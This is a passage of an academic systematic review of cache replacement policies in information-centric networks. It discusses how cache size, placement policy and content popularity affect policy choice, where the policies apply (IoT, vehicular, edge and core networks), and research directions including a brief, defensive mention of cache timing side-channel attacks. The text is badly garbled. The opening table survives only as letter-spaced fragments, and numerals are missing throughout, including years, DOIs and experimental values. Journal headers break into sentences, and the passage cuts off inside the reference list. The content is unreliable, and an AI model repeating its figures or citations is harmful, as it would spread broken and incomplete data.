ab il it y [n od e- lo ca ti on ] l r u an d r an d o m in te rc h an ge p o si ti o n s fo r d if fe re n t n o d e lo ca ti o n s n ew be rr y & z h an g ( ) d at a c en te r f at -t re e; c r s – / – c o re , ag gr eg at io n , ed ge , , , an d m b – k b l c e l r u , q ,a r c , l ir s an d m q t o ta l n et w o rk tr af fi c [n od e- lo ca ti on ] [c ac h e- si ze ] d if fe re n t p o li ci es fo r d if fe re n t n o d e lo ca ti o n s, fo r d if fe re n t ap p li ca ti o n s, an d fo r d if fe re n t ca ch e si ze s pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t ab le (c o n ti n u ed ) n et w o rk n o d e c o n te n t ic n ar ch it ec tu re r ef er en ce s t o p o lo gy n . c o n s. / n . p ro d . n . o b je ct s an d r eq u es ts l o ca ti o n o f th e n o d e c ac h e si ze p o p u la ri ty (z ip f( a) ) c h u n k si ze p la ce m en t p o li cy e vi ct io n p o li cy m et ri cs e ff ec t c h ao et al . ( ) – – o b je ct s; re q u es ts /s ; si m u la ti o n ti m e o f . s – [ – ] o b je ct s . – – f c d c , l r u an d r u f h it ra te [c ac h e- si ze ] l r u an d f c d c in te rc h an ge p o si ti o n s fo r d if fe re n t ca ch e si ze s w an g et al . ( a ) c as ca d e; c r s – o b je ct s – ap ro x. [ – ] o b je ct s . , . , an d . – l c e an d e v p la ce m en t l r u , e v r ep la ce m en t, an d p o p u e n er gy ef fi ci en cy [c ac h e- si ze ] d if fe re n t co m b in at io n s o f p la ce m en t an d re p la ce m en t p o li ci es fo r d if fe re n t ca ch e si ze s l iu et al . ( b ) t re e; c r s / . o b je ct s; ap ro x. re q u es ts /s ; si m u la ti o n ti m e o f s e d ge an d in te rm ed ia te [ – ] m b . – l c e p b r s, l r u , l f u an d f if o h it ra te [c ac h e- si ze ] l f u an d p b r s in te rc h an ge p o si ti o n s fo r d if fe re n t ca ch e si ze s su n et al . ( ) in te rn et -l ik e; k c r s m il li on / m o re th an k o b je ct s, w it h to ta l vo lu m e o f t b ; m il li on re q u es ts e d ge , m id d le , an d c o re g b , g b , g b , an d t b . – l c e , l c d , r an d , p ro b, p p ro b , c en tr al it y an d c ro ss l r u , l f u , f if o , t t l an d si ze h it ra te ; t ra ffi c re d u ct io n ; se rv er lo ad re d u ct io n [c ac h e- si ze ] [p la ce m en t- po li cy ] d if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t ca ch e si ze s, an d fo r d if fe re n t p la ce m en t p o li ci es c h en et al . ( ) w ir el es s m es h ; c r s – t o ta l o f re q u es ts ; si m u la ti o n ti m e o f h – b yt es . b yt es l c e , l c p , l c d , an d l c b l r u , l f u , r an d o m , an d f if o h it ra ti o ; e n er gy co n su m p ti o n [p la ce m en t- po li cy ] d if fe re n t ev ic ti o n p o li ci es fo r d if fe re n t p la ce m en t p o li ci es n o te : c r , c o n te n t r o u te r; n . c o n s. /n . p ro d ., n u m b er o f co n te n t co n su m er s/ n u m b er o f co n te n t p ro d u ce rs . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ another observed effect of the relationship between cache size and replacement policy gain is that as the relative cache size increases, the performance difference among the techniques decreases (charpinel et al., ; han et al., ; nakayama, ata & oka, ; bilal & kang, ; xing et al., ; panigrahi et al., ; li, simon & gravey, ; fricker et al., b; newberry & zhang, ). that means that the performances tend to converge eventually, and this is in line with che’s approximation (che, tung & wang, ), which we briefly discuss here. the longest possible time between two sequential hits for a content c present in the cache, that is, before removing c from the cache, is expected to be random and related to c. that is the cache eviction time for content c. however, che’s approximation stands that, for reasonably large cache sizes, this cache eviction time tends do be deterministic to the point of being a constant irrespective of the content. therefore, as cache size increases, the dependance on c decreases and becomes negligible. following this direction, if the dependance on the content decreases, the eviction policy’s dependance decreases because all contents converge to the same relevance in terms of eviction time. although che’s approximation has been proposed for a scenario with lru under independent reference model (irm), other extensions and generalizations also show the approximation’s validity to more scenarios (garetto, leonardi & martina, ; fricker, robert & roberts, a; araldo, rossi & martignon, ). cache placement policy icn in-path cache works as an opportunistic cache to distribute the content along with the network, and that opportunistic characteristic makes more flexible the distribution of caches on network nodes and the content location choices. once there is a cache, though, the replacement scheme is mandatory for all cache nodes. nevertheless, both content placement and replacement decisions are closely correlated and influence each other behaviors. the decisions can be implemented separately and combined according to the network requirements. each combination of placement and replacement policies can lead to different behaviors. on the other hand, both placement and replacement strategies may complement each other. some of the replacement schemes reported in icn literature are already coupled with a placement strategy (neves dos santos et al., ; sinky et al., ; ren et al., ; hu et al., ; pal & kant, ; xing et al., ; mick, tourani & misra, ; zhang, tan & li, b; wang et al., a; chen et al., ; khan & khan, ) and deployed in conjunction. in this work, we chose to look at the placement policy as a context factor that influences the replacement policy choice. this subsection presents the works (chen et al., ; tarnoi et al., ; sun et al., ) in which variations in the placement policies led to different choices of replacement schemes: � chen et al. ( ) develop an icn wsn system in which they tested combinations between four placement strategies: lce, prob (i.e., lcp), lcd, and betw (i.e., lcb)— and four replacement policies: random, fifo, lfu, and lru—in a wsn with nodes. the results reveal a significant variation in the rank of policies for different pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ combinations of placement policies and comparison metrics. considering the metric cache hit rate, lce and prob achieved their best results combined with lfu, while lcd and betw with random; yet, when considering the metric energy consumption, lce and prob achieved their best results with fifo, while lcd with lru, and lcb with random. � in addition to analyzing the effect of heterogeneous policies configuration by node locations, tarnoi et al. ( ) also analyzed variations on the replacement scheme choice according to the different placement policies. the work shows how the probabilistic caching placement behavior varies as a function of the replacement scheme. the authors evaluated combinations of lru, lfu, and random policies with lce and prob. in general, for both cascade and internet-like topologies, and considering both server load and round trip-hop distance evaluation metrics, the results show that prob can improve the performance of the network and achieve its best performance only when combined with lru, while lce achieves its best performance when in conjunction with lfu. � finally, as we mentioned earlier, the results reported by sun et al. ( ) show that the optimal choice of the replacement scheme depends on the cache size and the placement policy. regarding the variations of placement policies, the work combined seven placement policies: lce, lcd, rand, prob, probcache, betw (i.e., cent), and crcache (i.e., cross)—with five replacement policies: lru, lfu, fifo, ttl, and size—and the results presented evidence of the difference in performance ranks for each combination. for example, considering the metric server load reduction and g of cache size, lce, rand, prob, and probcache achieved its highest values when combined with ttl; while lcd with fifo; betw with lru; and crcache with ttl or lru. however, for cache sizes of g and t, all placement policies presented their best results with lfu, except for lcd, which achieved the best results combined with lru or ttl. the work also stands for a dominant strategy among the compared ones in terms of caching metrics. partially in line with chen et al. ( ), and contrary to the analysis presented by tarnoi et al. ( ), the authors place prob + lfu as the closest to the best strategy for their scenario. however, the analysis between the different results is limited because the two works (chen et al., ; sun et al., ) did not mention the probability value used for caching contents. the prob performance may vary according to the configured probability value. reinforcing the intrinsic correlation property between content placement and replacement decisions, all the works presented in this section show evidence of the different and unique effects of each policy’s combinations for distinct scenarios. different placement policies can have a different impact when changing a replacement scheme (rezazad & tay, ; tarnoi et al., ; zhang et al., a; meddeb et al., ). this way, each placement strategy requires evaluation of what replacement scheme performs the better. each placement policy has a different requirement in terms of evictions, and the more is the number of evictions, the more the placement policy relies on the replacement scheme and, therefore, is affected accordingly. pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ content: popularity one of the behaviors we were expecting to find evidence for was the impact of content popularity variation on the replacement policy choice, especially on the choice between frequency-based policies, for example, lfu, and others, like recency-based policies. that reasoning relies on the argument of many works that frequency-based policies suit better content populations with high popularity skewness, while with low popularity skewness would suit other policies (beck et al., ). however, while analyzing the variations of popularity skewness during the comparative evaluation of the replacement schemes, we found works in which popularity skewness variations did not influence policies’ rank (wang et al., ; gür, ; huang et al., ; zhang, tan & li, ; an & luo, ; jeon, lee & song, ; shailendra et al., ; liu et al., ; tarnoi et al., ; gallo et al., ; yokota et al., ; zhang, tan & li, b; sinky et al., ; yao et al., ). those comprehend works under zipf popularity distribution, with different variations of the skew factor from, for example, – , with conventional policies like lru and lfu as well new proposed policies, but the performance rank among the policies remained unchanged. variations in the skew factor represent variations in the distribution of contents’ popularity. the increase in the factor leads to an increase in the number of popular content. it is also associated with the diversity among contents. the increase in the number of popular contents reduces the diversity of the contents stored in the caches since popular contents are more conducive to occupy cache spaces for relatively long times. also, we observed a similar effect as the one about the increasing of cache size discussed earlier: under variations of the skew factor solely, as the skew factor increases, the difference of performance among the techniques decreases (badov et al., ; yokota et al., ; zhang, tan & li, b; zhang, tan & li, ; sinky et al., ; yao et al., ). for instance, during the evaluation of a proposed ppc policy, zhang, tan & li ( ) carried out experiments varying the zipf skew factor from . to . . they compared the policy performance against lru, lfu, fifo, and ccp. the results reveals that as the factor increases, the difference of cache hit ratio among the replacement schemes is reduced and tends to converge. remaining remarks this section presented many scenarios with evaluations of cache replacement policies that presented different behaviors according to variations in contexts. contextual factors are triggering this difference in performance, and this slr was able to identify some common factors in a set of works, as we exposed in the previous subsections. the influence of some contextual factors was already evident when looking at individual works. however, one of our intentions with this slr was to analyze the works that had similar effects, to look for patterns that could relate the contextual factors to the policy’s properties. that cames in contrast with the diversity of scenario characteristics and evaluated policies, which limited the analysis. besides, there was no more in-depth analysis of why and how the effects happened, most of the works came to evidence by testing the context variations, and small changes in the characteristics of the scenarios pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ could have lead to different results. in general, there was no explicit pattern in the surveyed works that associated the context factor to the policies or their properties. that also limited a more in-depth analysis from the perspective of the proportion of impacts for different contexts and scenarios, since the extent to which context characteristics affected cache replacement strategies varied for different scenarios. we must also highlight that most of the works did not indicate the confidence interval in their experiments. a few of the differences between policies’ performance measurements were relatively small, and a confidence interval would help investigate the significance of the difference values. due to the reasons mentioned above, the policy choosing process can not be reduced to rule-based schemes or related solutions. instead, the choosing process is suitable for solutions that dynamically analyze context factors and perform large-scale correlations between the factors and policies, for example, with reinforcement learning techniques. at this point, we can indicate, though, potential context characteristics to enhance the eviction performance in emergent icn scenarios. we present this analysis in the next section (applications). lastly, we also highlight the overlook of content-negative acknowledgments (content-nacks) packets. in icns, content-nacks are special packets generated by content producers in response to requests for non-existent content. they can be encoded as data packets with a specific content-type feature. in that case, content-nacks are processed as regular data packets and cached in the network routers. although caching content-nacks is useful to respond to possible subsequent requests for the same non-existent content efficiently, it may insert vulnerability points in icn architectures (compagno et al., ). current eviction policies are not aware of content-nack packets, and there is a need to investigate if this lack of awareness impacts cache management and security. nonetheless, a different approach is questioning if those packets should be cached on the network and how it could impact performance. in deciding not to cache, the processing of content-nacks can be delegated to the cache placement policies to bypass these packets. this way, the content-nacks could follow the forward processing of data packets without caching. applications the informational rfc (pentikousis et al., ) presented by the irtf-icnrg describes a set of application areas in which icn architectures can potentially perform better than the current host-centric internet approach. this technical document discusses diverse network contexts in emergent areas such as social networking, real-time communication, mobile networking, vehicular networking, delay- and disruption- tolerant networking (dtn), iot, and smart cities. thus, we extend the discussion to correlate characteristics of emergent networks with the context characteristics relevant to the choice of suitable cache replacement schemes. we highlight the most suitable context characteristics for generic network contexts on information-centric iot (arshad et al., ; dong & wang, ), vehicular named-data pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ networking (khelifi et al., ), and icn-enable edge and core networks (zhou et al., ; zhang et al., ) in the following subsections. table summarizes this discussion. information-centric internet of things the adoption of iot networks in many segments of society like healthcare, transportation, security, industry, agriculture, communications, and infotainment, is gradually changing the way people interact with the physical world by connecting new things to the internet. things can be any device enhanced with sensor and technology capabilities to generate and transmit data, and when aggregated with intelligent services of iot applications, they can improve processes, business, and life quality. the imminent revolution of iot applications must be followed by a revolution in how the network structure deals with the content. the current internet architecture is fundamentally not prepared to deal with the massive amount of data from an expected number of billions of heterogeneous devices. the majority of iot applications will be content-oriented, and tcp/ip will be struggling to meet their bandwidth requirements. cache-enabled solutions like information-centric architectures are strong candidates to assist in the deployment of iot applications (arshad et al., ; quevedo, corujo & aguiar, ; dong & wang, ; araújo, de sousa & sampaio, ). the ubiquitous content caching of icn contributes to reducing the delay to retrieve content and enhances the contents’ availability, especially when dealing with power restricted devices that periodically switch on and off in duty cycling to save resources. in cache-enabled network solutions, iot traffic usually is offloaded at the internet content routers through a connected gateway (rao, schelen & lindgren, ; meddeb et al., ) to aggregate the services of specialized iot cloud platforms, such as cisco iot cloud connect, microsoft azure iot suite, and google could iot. also, the iot devices table suggestion of cache replacement policy category for different icn-enable scenarios. cache-enable network characteristics and/or requirements policy category correlation of requirements with context dimensions iot (smart home, home care…) high heterogeneity among iot devices with different priorities; high ephemerality of contents; limited resources content and node-based content features, like content provider identification, priority, and time-related properties vanets high intermittency of connections; multi- path propagation; different strategies for delay-sensitive data from safety applications and delay-tolerant data from infotainment applications content and node-based node location properties like mobility pattern plus direction, node’s rank according to topology position; content features, like type, priority, and popularity and time-related properties edge computing (small-cells radio access; g; device-to-device (d d) communication; unmanned aerial vehicles (uavs)) high temporal and spatial correlation of content requests; enables clusters by user similarities content and future human- based content popularity properties; user preferences, habits, and social interaction internet-scale networks globally content preferences; heterogeneous link/node capacities; long geographical distances content, node and network- based content feature and popularity properties; network topology, resource, and time- related properties; node resource and traffic properties pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ can cache the traffic in a dynamically distributed iot network (hahm et al., ). whether one case or another, two significant characteristics are a large number of heterogeneous devices and the ephemerality of the content produced by them. therefore, the suitable kind of cache replacement schemes for information-centric iots should deal with both characteristics. in the former, the different types of devices usually have different resources restrictions in terms of processing capabilities, memory, energy constraints, and they produce contents with different requirements regarding the context. for example, smart cities will need to integrate intelligent urban sensing services for many proposes, such as management of smart garbage collection, street lighting, parking, the monitoring of road conditions, urban noise, security cameras, and environmental conditions, among other possibilities. in this case, the infrastructure comprises a diversity of sensors with different content production rates and characteristics. the replacement scheme may apply different treatment to the contents according to the type of device by exploring both content and node context dimensions, with features like content provider identification, content priority, and node resource features. the latter characteristic points out the typical time-restricted data generated by some iot devices that periodically inform sensor measurements monitoring the environment. for example, the content periodically generated by temperature sensors and collected by distributed applications to monitor the ambient in urban areas can be usefully cached to serve user applications’ requests. however, the most recent measure will usually be of interest to most applications, and there is no need to maintain the previous measures in the cache. the replacement scheme should also combine time-related features of the content context dimension in the eviction process logic. the combinations of the features mentioned above can help detect redundant contents from the same producer while increasing the techniques for stale content detection. vehicular named-data networking vehicular networking exhibit singular characteristics in traffic generation patterns, delivery requirements, and spatial and temporal scope (pentikousis et al., ), mostly due to high node mobility, very intermittent connections, and the support for typical road- traffic-related applications (li et al., a), infotainment applications, and code dissemination (li, zhao & wong, b). in vehicular networking, the vehicles can exchange information with any other communication device available next to the vehicle in a concept of vehicle-to-everything (v x) communication. this includes communication between vehicle and other vehicles (vehicle-to-vehicle—v v), or road infrastructure (vehicle-to-infrastructure—v i), communication network structure (vehicle-to-network—v n), pedestrians (vehicle-to- pedestrian—v p), or any other communication device. in all those variations, the content requests usually present highly temporal/spatial dependencies, and the in-network caching capabilities of icns can potentially improve the content delivery process. regarding the caching strategy, the replacement scheme should consider the characteristics mentioned above because they can affect the local relevance of contents. for example, accident information’s relevance is highly dependent on the vehicle location and the direction towards it was moving (de sousa, araújo & sampaio, ). if the pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ vehicle has passed the accident, that information may no longer be useful. the replacement schemes can handle this decision with node location properties like mobility pattern, plus vehicle direction, and node’s rank according to the current topology position. different strategies should be applied to deal with the different types of applications combined with node location properties. for that, the strategy can explore content features, like content type and content priority. the road-traffic-related applications, such as road congestion notification, traffic monitoring, and accident warning, usually are delay- sensitive applications and are better handled by content time-related properties or even newly type-specific properties. similarly, applications for code dissemination designed to support smart city infrastructures’ upgrades can benefit from those properties. meanwhile, the infotainment applications are mostly delay-tolerant and more suitable to be handled by content popularity features. in-network cache-based data offloading through edge computing caching at the edge in mobile edge computing (mec) (safavat, naveen & rawat, ) will play an essential role in the next-generation wireless network. the radio access network (ran) is enhanced with cache capacity on base station structures to better attend the content demand due to its proximity. this way, small-cell base stations (sbs), macro-cell base stations (mbs), wi-fi access points (ap), mobile devices, and even recent cache-enabled uavs (zhang et al., ; ji et al., ; huang et al., ) can store contents and respond to the content requests faster. uavs can act as flying base stations to support the ground cellular network. they can also work as relay nodes to assist content delivery and data collection in areas without available transmission links. the integration with icn concepts leverages the mobile-edge caching by supporting in-network caching (zhou et al., ; psaras et al., ; shariat, tizghadam & leon-garcia, ). the imminent fifth-generation ( g) mobile networks also reinforces that merge as several initiatives discuss the benefit of the integration with icn (zhang et al., ; liang, yu & zhang, ). a fundamental characteristic created by the user’s closeness is a high temporal and spatial correlation of content requests. in this way, one of the widely explored approaches at the network edge is user-centric clustering techniques (ribeiro, sampaio & ziviani, ; he, wang & wang, ; elbamby et al., ). user characteristics are the input and motivation for virtual groupings, whether regarding the network structure or the users’ connection to the network. as a consequence, user and their content requests can be grouped according to user behavior patterns. due to the characteristics above, the replacement schemes for in-network caching at the edge can benefit from content-based properties, especially content popularity features, and the exploration of a variety of human properties related to preferences, habits, and social interaction. therefore, user behavior analysis is a relevant area in the future of edge- caching, fostering future human-based replacement policies. icn-enabled core network icn’s benefits encompass large-scale networks with backbone core nodes and high-speed links with different capacities, interconnecting heterogeneous autonomous systems pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (as) with multiple access networks. in this way, core networks aggregate content requests from different access networks, and unlike the edge, the temporal/spatial correlation of requests is gradually reduced and becomes weaker as the content requests approach the core nodes. many solutions enhance icn’s applicability at core network structures for inter-domain network services such as routing (liu et al., a), traffic engineering (li et al., ), and globally accessible name schemes (van adrichem & kuipers, ). because of the considerable physical distances naturally presented in large-scale networks to connect content consumers and producers, requests typically have to traverse several nodes within the network. therefore, the network topology context must be taken into account to optimize cache replacement policies in content-based core nodes. context properties, in this case, are related to the distance connecting two end-nodes, like hop count, properties related to the network resources, like packet transmission cost, link capacity, and time-related features with network delay for retrieving content. the cache replacement schemes should also explore content and node contexts to reflect globally content preferences and the different capacities of core nodes, respectively. the content feature and popularity properties and node resource and traffic properties may further increment the replacement policies’ decision. on the other hand, there is a trade- off relating the performance while processing many context information, since core routers process requests at line speed. research directions in this section, we discuss different research directions for context-aware cache replacement schemes in icns. context information management dealing with contextual information requires well-defined procedures on acquiring, representing, reason, and distributing the information. context information management is widely studied and applied in many sciences that rely on context-awareness (perera et al., ). still, it is a challenge for complex systems such as dynamically distributed networks to efficiently perform online context management, especially when there is a need to represent a high number of dimensions and elements relevant to represent the domain. the integration between icn and sdns (kim, chung & moon, ; charpinel et al., ; yao et al., ; kalghoum, gammar & saidane, ; liu et al., ; saadeh et al., ) can further benefit context management solutions because of the sdn paradigm’s centralized control view. it is necessary to investigate what context information could be efficiently handled by central controlling. the sets of context features identified within our proposed classification are enablers to a semantic representation of the context domain and can be extended or adapted according to different application requirements. however, towards an efficient real-world deployment, there is also the need to argue about the quality of context information. quality can associate many aspects like reliability, precision, timeless, access right, significance, granularity, and completeness. those aspects are translated into metrics defined by the science of quality of context (qoc) (buchholz, küpper & schiffers, pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ). the relevance of qoc metrics varies following the type of information. hence, different qoc metrics should follow the different context subcategories in each context dimension. scalability of context suitability exploring context information is essential to address a mismatch between caching policies and emerging networks. this exploration contributes to achieving more potentially precise and customized techniques. however, the more the use of contextual information, the more computationally expensive the caching scheme might become. the need to compute more context information may increase the complexity of the caching policy itself. therefore, it is essential to investigate the performance cost of individual context information and the solution as a whole. the performance cost depends not only on managing the information but also on how the policy treats the information. machine learning techniques in addition to being used for context information inference (zhao et al., ; nakayama, ata & oka, ; liu et al., ), machine learning techniques can investigate how to exploit better context information to optimize the eviction process. in one perspective, machine learning techniques could select which contextual information is most relevant and should shape the eviction process. the relevance of contextual information may vary depending on the network and objectives. this way, given a network with a set of available contextual information, it would help investigate how to choose what should be used by the eviction scheme to increase network performance. in another perspective, the techniques can direct the learning of the best kind of policy based on what context information is available. reinforcement learning techniques have been successfully applied for caching schemes (sung et al., ; sadeghi, sheikholeslami & giannakis, ). however, in those works, the context state is represented solely by the cached contents in an instant of time. it would be relevant to extend the concept of context to represent the state with more available information that would impact the learning policy process. depending on the number of context information used, there may be a large space of possible states, which will require considerable computational effort to represent the possible variations. when most of the states are rarely revisited, the chosen technique must deal with some sort of generalization. furthermore, model-free techniques are best indicated when there is no previous knowledge dataset to help the decision process. dynamic and adaptive instantiation of cache policies along with sdn and icn, network function virtualization (nfv) techniques are strong candidates for realizing and fostering next-generation networks (zhang et al., ; saadeh et al., ). through the network function virtualization concept, in-network caching strategies can quickly execute as virtual network function (vnf) along with some management structure. this combination paves the way for efficient deployment of pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ adaptive caching policies according to the context’s dynamic changes. to realize a plug- and-play vision of virtual function would be interesting to have a rich repository of heterogeneous caching functions and multi-attribute functions exploring different combinations of context information. human aspects in recent years, the community has witnessed a growing number of researches focused on solutions that exploit the human-user context to solve problems in different areas (shafigh et al., ; zaidi et al., ; zeng et al., ). due to mobile computing expansion, networking-related studies also tend to consider human aspects such as interactions, social ties, and personality to propose human-awareness solutions. this movement from device-to-device to people-to-people communication paradigm aims to look at network configurations taking into account the user’s perspective, integrating human perception approaches with qos metrics, and further, with the mapping of user behavioral profiles. network contexts are more likely to cope with group-based rather than individual user profiles. different user profiles, such as personality profiles, may reflect distinct patterns of how users in each profile interact with the network, and consequently, each profile may produce different impacts on the network resource consumption. therefore, the network can adapt according to the predominant user profiles to improve the distribution/consumption of resources and user qoe at the same time. in icn research, human factors present great potentials to improve the communication service delivery, in particular through adaptive caching solutions (ribeiro, sampaio & ziviani, ). one approach is to explore potential correlations between user characteristics and cache policies and adopt mechanisms for dynamically adapt the most suitable caching strategies to the predominant user behavior. a key challenging consists of finding out the human aspects that most positively impact the network efficiency and how they could be operatively explored in icn architectures. that requires a multidisciplinary view with the integration of psychology research to support lower granularity levels of user information. privacy in-network cache aggregates benefits to icn architectures by reducing bandwidth consumption and the latency to deliver contents over the network, but it also introduces architectural vulnerabilities regarding cache privacy (acs et al., ). for example, in side-channel timing attacks, a malicious user can deduce what content was accessed recently by another user on the same network by merely measuring content delivery times with standard content requests. acs et al. ( ) discussed techniques for mitigating privacy caching attacks in which contents marked as private could have different treatments by the cache management mechanism. one countermeasure presented to inhibit the timing attack consists of the insertion of artificial delay times in the content delivery process, so the malicious user cannot differentiate which content was retrieved from the cache or directly from the producer. pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recent efforts from the ndn research community have tried to address many of the current privacy concerns (compagno et al., ; dogruluk et al., ), but more work lies ahead concerning the context information processed by caching strategies. the use of context information to allow the dynamic adoption of the most appropriate cache policy may require the processing of sensitive data of related users stored in communication devices. one major concern resides in guaranteeing the anonymity of data processed, particularly involving users for privacy-preserving cache management. similarly, there is a concern about the privacy of cache management strategies adopted on the network routers. fan et al. ( ) recently presented a method capable of detecting the placement policy configured in the routers. as described in the malicious attempt to discover the previously accessed content in the network, the method does not require any privileged access and can infer a placement policy through ordinary content requests. knowing the strategies used for content management can enhance the inference mechanisms of accessed content. conclusions this article presented a comprehensive and systematic review of studies regarding cache replacement policies in icns. the literature presents a vast set of eviction strategies exploiting combinations of multi-dimension aspects of context information in different ways, aiming at making more customized and effective decisions about the relevance of contents. thus, among its findings, the slr showed the relevance of considering context’s properties in choosing suitable replacement policies. the study revealed that efficient utilization of cache resources in icns relies on deploying cache replacement policies according to the network contexts. the slr contributes to characterize the context factors correlated with the caching policies and the reported effect of context variations on cache replacement policies’ performance. the compilation of evidence shows no single context factor determining the choice of policies; there is no explicit pattern regarding context properties variations to support the choosing process of policies for different network contexts. the results reaffirm the absence of a single optimal strategy to meet the requirements of all network since the caching policies’ performances vary according to different context characteristics. additionally, the dynamic nature of most networks leads to on-demand changes in the context characteristics, for instance, changes in traffic patterns or user preferences, and the icn strategies must adapt to these changes in an attempt to ensure the best network performance. therefore, there is the need to assist the choosing process of suitable schemes according to the current context, and further, to cope with the natural dynamism of context variations in networks. additional information and declarations funding this work was supported by capes ( . / - ), fapesb (tic / ), cnpq ( . / - , / - ), and faperj (e- / . / ). there was no pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: capes: . / - . fapesb: tic / . cnpq: . / - and / - . faperj: e- / . / . competing interests the authors declare that they have no competing interests. author contributions � stéfani pires conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � artur ziviani conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � leobino n. sampaio conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the study did not use raw data or code as it is a literature review. references abdullahi i, arif s, hassan s. . survey on caching approaches in information centric networking. journal of network and computer applications : – . abidi a, gammar s. . towards new caching strategy for information-centric networking based on data proximity control. in: ieee international conference on computer and information technology; ubiquitous computing and communications; dependable, autonomic and secure computing; pervasive intelligence and computing (cit/iucc/dasc/picom). piscataway: ieee, – . abowd gd, dey ak, brown pj, davies n, smith m, steggles p. . towards a better understanding of context and context-awareness. in: international symposium on handheld and ubiquitous computing. springer, – . abrams m, standridge c, abdulla g, fox e, williams s. . removal policies in network caches for world-wide web documents. acm sigcomm computer communication review ( ): – . acs g, conti m, gasti p, ghali c, tsudik g. . cache privacy in named-data networking. in: ieee rd international conference on distributed computing systems. piscataway: ieee, – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ahlgren b, dannewitz c, imbrenda c, kutscher d, ohlman b. . a survey of information- centric networking. ieee communications magazine ( ): – . al-turjman f. . cognitive caching for the future sensors in fog networking. pervasive and mobile computing : – . al-turjman fm, al-fagih ae, hassanein hs. . a value-based cache replacement approach for information-centric networks. in: lcn workshops. – . alegre u, augusto jc, clark t. . engineering context-aware systems and applications: a survey. journal of systems and software : – . amadeo m, campolo c, molinaro a. . information-centric networking for connected vehicles: a survey and future perspectives. ieee communications magazine ( ): – . amadeo m, campolo c, molinaro a, ruggeri g. . content-centric wireless networking: a survey. computer networks : – . an y, luo x. . an in-network caching scheme based on energy efficiency for content-centric networks. ieee access : – . aoki m, shigeyasu t. . effective content management technique based on cooperation cache among neighboring routers in content-centric networking. in: st international conference on advanced information networking and applications workshops (waina). piscataway: ieee, – . araújo frc, de sousa am, sampaio ln. . scan-mob: an opportunistic caching strategy to support producer mobility in named data wireless networking. computer networks : – . araldo a, rossi d, martignon f. . cost-aware caching: caching more (costly items) for less (isps operational expenditures). ieee transactions on parallel and distributed systems ( ): – . arshad s, azam ma, rehmani mh, loo j. . recent advances in information-centric networking-based internet of things (icn-iot). ieee internet of things journal ( ): – . badov m, seetharam a, kurose j, firoiu v, nanda s. . congestion-aware caching and search in information-centric networks. in: proceedings of the st acm conference on information- centric networking. new york: acm, – . balamash a, krunz m. . an overview of web caching replacement algorithms. ieee communications surveys & tutorials ( ): – . bari mf, chowdhury sr, ahmed r, boutaba r, mathieu b. . a survey of naming and routing in information-centric networks. ieee communications magazine ( ): – . baugh jp, guo j. . a per-face popularity scheme to increase cache robustness in information- centric networks. procedia computer science : – . beck h, bierbaumer b, dao-tran m, eiter t, hellwagner h, schekotihin k. . stream reasoning-based control of caching strategies in ccn routers. in: ieee international conference on communications (icc). piscataway: ieee, – . bettini c, brdiczka o, henricksen k, indulska j, nicklas d, ranganathan a, riboni d. . a survey of context modelling and reasoning techniques. pervasive and mobile computing ( ): – . bilal m, kang s-g. . time aware least recent used (tlru) cache management policy in icn. in: th international conference on advanced communication technology (icact), . piscataway: ieee, – . bilal m, kang s-g. . a cache management scheme for efficient content eviction and replication in cache networks. ieee access : – . pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ buchholz t, küpper a, schiffers m. . quality of context: what it is and why we need it. in: workshop of the hp openview university association. caarls w, hargreaves e, menasché ds. . q-caching: an integrated reinforcement-learning approach for caching and routing in information-centric networks. available at https://arxiv. org/abs/ . . chai wk, he d, psaras i, pavlou g. . cache “less for more’’ in information-centric networks. in: bestak r, kencl l, li le, widmer j, yin h, eds. networking . lecture notes in computer science. vol. . berlin: springer doi . / - - - - _ . chandrasekaran g, wang n, hassanpour m, xu m, tafazolli r. . mobility as a service (maas): a d d-based information centric network architecture for edge-controlled content distribution. ieee access : – . chandrasekaran g, wang n, tafazolli r. . caching on the move: towards d d-based information centric networking for mobile content distribution. in: ieee th conference on local computer networks (lcn). piscataway: ieee, – . chao f, huang t, jiang l, chen j-y., liu y-j. . fast convergence caching replacement algorithm based on dynamic classification for content-centric networks. journal of china universities of posts and telecommunications ( ): – . charpinel s, santos cas, vieira ab, villaca r, martinello m. . sdccn: a novel software defined content-centric networking approach. in: ieee th international conference on advanced information networking and applications (aina). piscataway: ieee, – . che h, tung y, wang z. . hierarchical web 